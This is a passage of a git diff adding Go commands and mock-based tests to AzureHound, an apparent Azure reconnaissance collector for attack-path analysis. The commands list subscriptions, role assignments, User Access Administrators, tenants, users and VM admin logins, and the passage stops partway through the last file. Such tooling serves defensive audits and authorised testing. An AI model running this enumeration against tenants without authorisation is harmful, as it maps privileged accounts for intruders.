b/cmd/list-subscription-role-assignments.go new file mode 100644 index 0000000..09ef036 --- /dev/null +++ b/cmd/list-subscription-role-assignments.go @@ -0,0 +1,132 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "sync" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listSubscriptionRoleAssignmentsCmd) +} + +var listSubscriptionRoleAssignmentsCmd = &cobra.Command{ + Use: "subscription-role-assignments", + Long: "Lists Subscription Role Assignments", + Run: listSubscriptionRoleAssignmentsCmdImpl, + SilenceUsage: true, +} + +func listSubscriptionRoleAssignmentsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure subscription role assignments...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + stream := listSubscriptionRoleAssignments(ctx, azClient, subscriptions) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listSubscriptionRoleAssignments(ctx context.Context, client client.AzureClient, subscriptions <-chan interface{}) <-chan interface{} { + var ( + out = make(chan interface{}) + ids = make(chan string) + streams = pipeline.Demux(ctx.Done(), ids, config.ColStreamCount.Value().(int)) + wg sync.WaitGroup + ) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(ids) + + for result := range pipeline.OrDone(ctx.Done(), subscriptions) { + if subscription, ok := result.(AzureWrapper).Data.(models.Subscription); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating subscription role assignments", "result", result) + return + } else { + if ok := pipeline.Send(ctx.Done(), ids, subscription.Id); !ok { + return + } + } + } + }() + + wg.Add(len(streams)) + for i := range streams { + stream := streams[i] + go func() { + defer panicrecovery.PanicRecovery() + defer wg.Done() + for id := range stream { + var ( + subscriptionRoleAssignments = models.SubscriptionRoleAssignments{ + SubscriptionId: id, + } + count = 0 + ) + for item := range client.ListRoleAssignmentsForResource(ctx, id, "atScope()", "") { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing role assignments for this subscription", "subscriptionId", id) + } else { + subscriptionRoleAssignment := models.SubscriptionRoleAssignment{ + SubscriptionId: id, + RoleAssignment: item.Ok, + } + log.V(2).Info("found subscription role assignment", "subscriptionRoleAssignment", subscriptionRoleAssignment) + count++ + subscriptionRoleAssignments.RoleAssignments = append(subscriptionRoleAssignments.RoleAssignments, subscriptionRoleAssignment) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZSubscriptionRoleAssignment, + Data: subscriptionRoleAssignments, + }); !ok { + return + } + log.V(1).Info("finished listing subscription role assignments", "subscriptionId", id, "count", count) + } + }() + } + + go func() { + wg.Wait() + close(out) + log.Info("finished listing all subscription role assignments") + }() + + return out +} diff --git a/cmd/list-subscription-role-assignments_test.go b/cmd/list-subscription-role-assignments_test.go new file mode 100644 index 0000000..73a74d8 --- /dev/null +++ b/cmd/list-subscription-role-assignments_test.go @@ -0,0 +1,114 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListSubscriptionRoleAssignments(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockSubscriptionsChannel := make(chan interface{}) + mockSubscriptionRoleAssignmentChannel := make(chan client.AzureResult[azure.RoleAssignment]) + mockSubscriptionRoleAssignmentChannel2 := make(chan client.AzureResult[azure.RoleAssignment]) + + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockSubscriptionRoleAssignmentChannel).Times(1) + mockClient.EXPECT().ListRoleAssignmentsForResource(gomock.Any(), gomock.Any(), gomock.Any(), gomock.Any()).Return(mockSubscriptionRoleAssignmentChannel2).Times(1) + channel := listSubscriptionRoleAssignments(ctx, mockClient, mockSubscriptionsChannel) + + go func() { + defer close(mockSubscriptionsChannel) + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + mockSubscriptionsChannel <- AzureWrapper{ + Data: models.Subscription{}, + } + }() + go func() { + defer close(mockSubscriptionRoleAssignmentChannel) + mockSubscriptionRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.ContributorRoleID, + }, + }, + } + mockSubscriptionRoleAssignmentChannel <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + }() + go func() { + defer close(mockSubscriptionRoleAssignmentChannel2) + mockSubscriptionRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Ok: azure.RoleAssignment{ + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.OwnerRoleID, + }, + }, + } + mockSubscriptionRoleAssignmentChannel2 <- client.AzureResult[azure.RoleAssignment]{ + Error: mockError, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.SubscriptionRoleAssignments); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionRoleAssignments{}) + } else if len(data.RoleAssignments) != 2 { + t.Errorf("got %v, want %v", len(data.RoleAssignments), 2) + } + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if data, ok := wrapper.Data.(models.SubscriptionRoleAssignments); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionRoleAssignments{}) + } else if len(data.RoleAssignments) != 1 { + t.Errorf("got %v, want %v", len(data.RoleAssignments), 2) + } +} diff --git a/cmd/list-subscription-user-access-admins.go b/cmd/list-subscription-user-access-admins.go new file mode 100644 index 0000000..c3f78fa --- /dev/null +++ b/cmd/list-subscription-user-access-admins.go @@ -0,0 +1,109 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "path" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listSubscriptionUserAccessAdminsCmd) +} + +var listSubscriptionUserAccessAdminsCmd = &cobra.Command{ + Use: "subscription-user-access-admins", + Long: "Lists Azure Subscription User Access Admins", + Run: listSubscriptionUserAccessAdminsCmdImpl, + SilenceUsage: true, +} + +func listSubscriptionUserAccessAdminsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure subscription user access admins...") + start := time.Now() + subscriptions := listSubscriptions(ctx, azClient) + roleAssignments := listSubscriptionRoleAssignments(ctx, azClient, subscriptions) + stream := listSubscriptionUserAccessAdmins(ctx, azClient, roleAssignments) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listSubscriptionUserAccessAdmins(ctx context.Context, client client.AzureClient, vmRoleAssignments <-chan interface{}) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + + for result := range pipeline.OrDone(ctx.Done(), vmRoleAssignments) { + if roleAssignments, ok := result.(AzureWrapper).Data.(models.SubscriptionRoleAssignments); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue enumerating subscription user access admins", "result", result) + return + } else { + var ( + subscriptionUserAccessAdmins = models.SubscriptionUserAccessAdmins{ + SubscriptionId: roleAssignments.SubscriptionId, + } + count = 0 + ) + for _, item := range roleAssignments.RoleAssignments { + roleDefinitionId := path.Base(item.RoleAssignment.Properties.RoleDefinitionId) + + if roleDefinitionId == constants.UserAccessAdminRoleID { + subscriptionUserAccessAdmin := models.SubscriptionUserAccessAdmin{ + UserAccessAdmin: item.RoleAssignment, + SubscriptionId: item.SubscriptionId, + } + log.V(2).Info("found subscription user access admin", "subscriptionUserAccessAdmin", subscriptionUserAccessAdmin) + count++ + subscriptionUserAccessAdmins.UserAccessAdmins = append(subscriptionUserAccessAdmins.UserAccessAdmins, subscriptionUserAccessAdmin) + } + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZSubscriptionUserAccessAdmin, + Data: subscriptionUserAccessAdmins, + }); !ok { + return + } + log.V(1).Info("finished listing subscription user access admins", "subscriptionId", roleAssignments.SubscriptionId, "count", count) + } + } + log.Info("finished listing all subscription user access admins") + }() + + return out +} diff --git a/cmd/list-subscription-user-access-admins_test.go b/cmd/list-subscription-user-access-admins_test.go new file mode 100644 index 0000000..1a6a8dc --- /dev/null +++ b/cmd/list-subscription-user-access-admins_test.go @@ -0,0 +1,78 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListSubscriptionUserAccessAdmins(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + + mockRoleAssignmentsChannel := make(chan interface{}) + mockTenant := azure.Tenant{} + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + channel := listSubscriptionUserAccessAdmins(ctx, mockClient, mockRoleAssignmentsChannel) + + go func() { + defer close(mockRoleAssignmentsChannel) + + mockRoleAssignmentsChannel <- AzureWrapper{ + Data: models.SubscriptionRoleAssignments{ + SubscriptionId: "foo", + RoleAssignments: []models.SubscriptionRoleAssignment{ + { + RoleAssignment: azure.RoleAssignment{ + Name: constants.UserAccessAdminRoleID, + Properties: azure.RoleAssignmentPropertiesWithScope{ + RoleDefinitionId: constants.UserAccessAdminRoleID, + }, + }, + }, + }, + }, + } + }() + + if result, ok := <-channel; !ok { + t.Fatalf("failed to receive from channel") + } else if wrapper, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } else if _, ok := wrapper.Data.(models.SubscriptionUserAccessAdmins); !ok { + t.Errorf("failed type assertion: got %T, want %T", wrapper.Data, models.SubscriptionUserAccessAdmins{}) + } + + if _, ok := <-channel; ok { + t.Error("should not have recieved from channel") + } +} diff --git a/cmd/list-subscriptions.go b/cmd/list-subscriptions.go new file mode 100644 index 0000000..c1a6f24 --- /dev/null +++ b/cmd/list-subscriptions.go @@ -0,0 +1,115 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listSubscriptionsCmd) +} + +var listSubscriptionsCmd = &cobra.Command{ + Use: "subscriptions", + Long: "Lists Azure Active Directory Subscriptions", + Run: listSubscriptionsCmdImpl, + SilenceUsage: true, +} + +func listSubscriptionsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory subscriptions...") + start := time.Now() + stream := listSubscriptions(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listSubscriptions(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + var ( + count = 0 + selectedSubIds = config.AzSubId.Value().([]string) + selectedMgmtGroupIds = config.AzMgmtGroupId.Value().([]string) + filterOnSubs = len(selectedSubIds) != 0 || len(selectedMgmtGroupIds) != 0 + ) + + if len(selectedMgmtGroupIds) != 0 { + descendantChannel := listManagementGroupDescendants(ctx, client, listManagementGroups(ctx, client)) + for i := range descendantChannel { + if item, ok := i.(AzureWrapper).Data.(azure.DescendantInfo); !ok { + log.Error(fmt.Errorf("failed type assertion"), "unable to continue evaluating management group descendants", "result", i) + return + } else if item.Type == "Microsoft.Management/managementGroups/subscriptions" { + selectedSubIds = append(selectedSubIds, item.Name) + } + } + } + uniqueSubIds := unique(selectedSubIds) + + for item := range client.ListAzureSubscriptions(ctx) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing subscriptions") + return + } else if !filterOnSubs || contains(uniqueSubIds, item.Ok.SubscriptionId) { + log.V(2).Info("found subscription", "subscription", item) + count++ + // the embedded struct's values override top-level properties so TenantId + // needs to be explicitly set. + data := models.Subscription{ + Subscription: item.Ok, + } + data.TenantId = client.TenantInfo().TenantId + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZSubscription, + Data: data, + }); !ok { + return + } + } + } + log.Info("finished listing all subscriptions", "count", count) + }() + + return out +} diff --git a/cmd/list-subscriptions_test.go b/cmd/list-subscriptions_test.go new file mode 100644 index 0000000..3e9f8be --- /dev/null +++ b/cmd/list-subscriptions_test.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListSubscriptions(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.Subscription]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureSubscriptions(gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.Subscription]{ + Ok: azure.Subscription{}, + } + mockChannel <- client.AzureResult[azure.Subscription]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.Subscription]{ + Ok: azure.Subscription{}, + } + }() + + channel := listSubscriptions(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-tenants.go b/cmd/list-tenants.go new file mode 100644 index 0000000..3e02caf --- /dev/null +++ b/cmd/list-tenants.go @@ -0,0 +1,104 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listTenantsCmd) +} + +var listTenantsCmd = &cobra.Command{ + Use: "tenants", + Long: "Lists Azure Active Directory Tenants", + Run: listTenantsCmdImpl, + SilenceUsage: true, +} + +func listTenantsCmdImpl(cmd *cobra.Command, args []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory tenants...") + start := time.Now() + stream := listTenants(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listTenants(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + + // Send the fully hydrated tenant that is being collected + collectedTenant := client.TenantInfo() + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZTenant, + Data: models.Tenant{ + Tenant: collectedTenant, + Collected: true, + }, + }); !ok { + return + } + count := 1 + for item := range client.ListAzureADTenants(ctx, true) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing tenants") + return + } else { + log.V(2).Info("found tenant", "tenant", item) + count++ + + // Send the remaining tenant trusts + if item.Ok.TenantId != collectedTenant.TenantId { + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZTenant, + Data: models.Tenant{ + Tenant: item.Ok, + }, + }); !ok { + return + } + } + } + } + log.Info("finished listing all tenants", "count", count) + }() + + return out +} diff --git a/cmd/list-tenants_test.go b/cmd/list-tenants_test.go new file mode 100644 index 0000000..c0648e3 --- /dev/null +++ b/cmd/list-tenants_test.go @@ -0,0 +1,69 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListTenants(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.Tenant]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADTenants(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.Tenant]{ + Ok: azure.Tenant{}, + } + mockChannel <- client.AzureResult[azure.Tenant]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.Tenant]{ + Ok: azure.Tenant{}, + } + }() + + channel := listTenants(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-users.go b/cmd/list-users.go new file mode 100644 index 0000000..be94d8a --- /dev/null +++ b/cmd/list-users.go @@ -0,0 +1,106 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/query" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listUsersCmd) +} + +var listUsersCmd = &cobra.Command{ + Use: "users", + Long: "Lists Azure Active Directory Users", + Run: listUsersCmdImpl, + SilenceUsage: true, +} + +func listUsersCmdImpl(cmd *cobra.Command, _ []string) { + ctx, stop := signal.NotifyContext(cmd.Context(), os.Interrupt, os.Kill) + defer gracefulShutdown(stop) + + log.V(1).Info("testing connections") + azClient := connectAndCreateClient() + log.Info("collecting azure active directory users...") + start := time.Now() + stream := listUsers(ctx, azClient) + panicrecovery.HandleBubbledPanic(ctx, stop, log) + outputStream(ctx, stream) + duration := time.Since(start) + log.Info("collection completed", "duration", duration.String()) +} + +func listUsers(ctx context.Context, client client.AzureClient) <-chan interface{} { + out := make(chan interface{}) + + params := query.GraphParams{Select: []string{ + "accountEnabled", + "createdDateTime", + "displayName", + "jobTitle", + "lastPasswordChangeDateTime", + "mail", + "onPremisesSecurityIdentifier", + "onPremisesSyncEnabled", + "userPrincipalName", + "userType", + "id", + }} + + go func() { + defer panicrecovery.PanicRecovery() + defer close(out) + count := 0 + for item := range client.ListAzureADUsers(ctx, params) { + if item.Error != nil { + log.Error(item.Error, "unable to continue processing users") + return + } else { + log.V(2).Info("found user", "user", item) + count++ + user := models.User{ + User: item.Ok, + TenantId: client.TenantInfo().TenantId, + TenantName: client.TenantInfo().DisplayName, + } + if ok := pipeline.SendAny(ctx.Done(), out, AzureWrapper{ + Kind: enums.KindAZUser, + Data: user, + }); !ok { + return + } + } + } + log.Info("finished listing all users", "count", count) + }() + + return out +} diff --git a/cmd/list-users_test.go b/cmd/list-users_test.go new file mode 100644 index 0000000..59028e0 --- /dev/null +++ b/cmd/list-users_test.go @@ -0,0 +1,70 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "fmt" + "testing" + + "github.com/bloodhoundad/azurehound/v2/client" + "github.com/bloodhoundad/azurehound/v2/client/mocks" + "github.com/bloodhoundad/azurehound/v2/models/azure" + "go.uber.org/mock/gomock" +) + +func init() { + setupLogger() +} + +func TestListUsers(t *testing.T) { + ctrl := gomock.NewController(t) + defer ctrl.Finish() + + ctx := context.Background() + + mockClient := mocks.NewMockAzureClient(ctrl) + mockChannel := make(chan client.AzureResult[azure.User]) + mockTenant := azure.Tenant{} + mockError := fmt.Errorf("I'm an error") + mockClient.EXPECT().TenantInfo().Return(mockTenant).AnyTimes() + mockClient.EXPECT().ListAzureADUsers(gomock.Any(), gomock.Any()).Return(mockChannel) + + go func() { + defer close(mockChannel) + mockChannel <- client.AzureResult[azure.User]{ + Ok: azure.User{}, + } + mockChannel <- client.AzureResult[azure.User]{ + Error: mockError, + } + mockChannel <- client.AzureResult[azure.User]{ + Ok: azure.User{}, + } + }() + + channel := listUsers(ctx, mockClient) + result := <-channel + if _, ok := result.(AzureWrapper); !ok { + t.Errorf("failed type assertion: got %T, want %T", result, AzureWrapper{}) + } + + if _, ok := <-channel; ok { + t.Error("expected channel to close from an error result but it did not") + } +} diff --git a/cmd/list-virtual-machine-admin-logins.go b/cmd/list-virtual-machine-admin-logins.go new file mode 100644 index 0000000..3bbcd30 --- /dev/null +++ b/cmd/list-virtual-machine-admin-logins.go @@ -0,0 +1,81 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "context" + "os" + "os/signal" + "time" + + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/bloodhoundad/azurehound/v2/enums" + "github.com/bloodhoundad/azurehound/v2/internal" + "github.com/bloodhoundad/azurehound/v2/models" + "github.com/bloodhoundad/azurehound/v2/panicrecovery" + "github.com/bloodhoundad/azurehound/v2/pipeline" + "github.com/spf13/cobra" +) + +func init() { + listRootCmd.AddCommand(listVirtualMachineAdminLoginsCmd) +} + +var listVirtualMachineAdminLoginsCmd = &cobra.Command{ + Use: "virtual-machine-admin-logins", + Long: "Lists Azure Virtual Machine Admin Logins", + Run: 